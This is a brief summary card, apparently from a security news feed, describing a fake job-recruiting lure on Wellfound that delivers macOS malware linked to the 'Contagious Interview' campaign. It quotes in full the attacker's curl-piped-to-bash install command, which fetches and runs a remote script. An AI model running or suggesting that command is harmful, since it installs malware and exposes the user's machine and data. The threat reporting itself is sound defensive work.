In r/hacking and r/malware, a fake recruiting flow on Wellfound delivers a macOS shell-piped installer, and the victim reverse-engineers it to extract config and infrastructure, tying it to the Contagious Interview tradecraft.
Got a Wellfound job offer from “Felix” at “HyperHives.” Looked legit.
Then they asked me to “review the product” before the call. Visiting their site triggered:
curl -s https://macos.hyperhives.net/install | nohup bash &
571 encrypted config values decrypted, C2 and Sentry DSN exposed, DPRK/Contagious Interview attribution.
This finding is one of many signals tracked across Cyber Security. The live feed updates every few hours with new authority voices, debates, and emerging ideas.
← Back to Cyber Security